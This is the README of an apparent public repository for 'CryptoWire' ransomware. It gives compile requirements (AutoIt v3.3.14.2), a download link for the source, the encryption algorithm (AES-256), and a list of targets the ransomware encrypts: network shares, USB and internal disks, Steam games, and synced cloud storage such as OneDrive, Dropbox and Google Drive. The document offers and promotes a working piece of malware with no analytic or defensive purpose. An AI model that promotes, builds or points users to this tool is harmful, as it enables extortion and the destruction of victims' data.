bdunlap9/CryptoWire-Ransomware/README.md

 Compile : Requires autoit version: v3.3.14.2

-Open source: http://ge.tt/1uQXLoa2 (Origanal Code: Unfinished and not ready to go)

 Encryption algoritm is AES 256.

 The ransomware will encrypt all files stored on: Network drives, Network Shares, Usb Drives/sticks, Externals Disks, Internal Disks, Games (Steam), Onedrive, Dropbox, Google Drive (any cloud service that is running on the machine).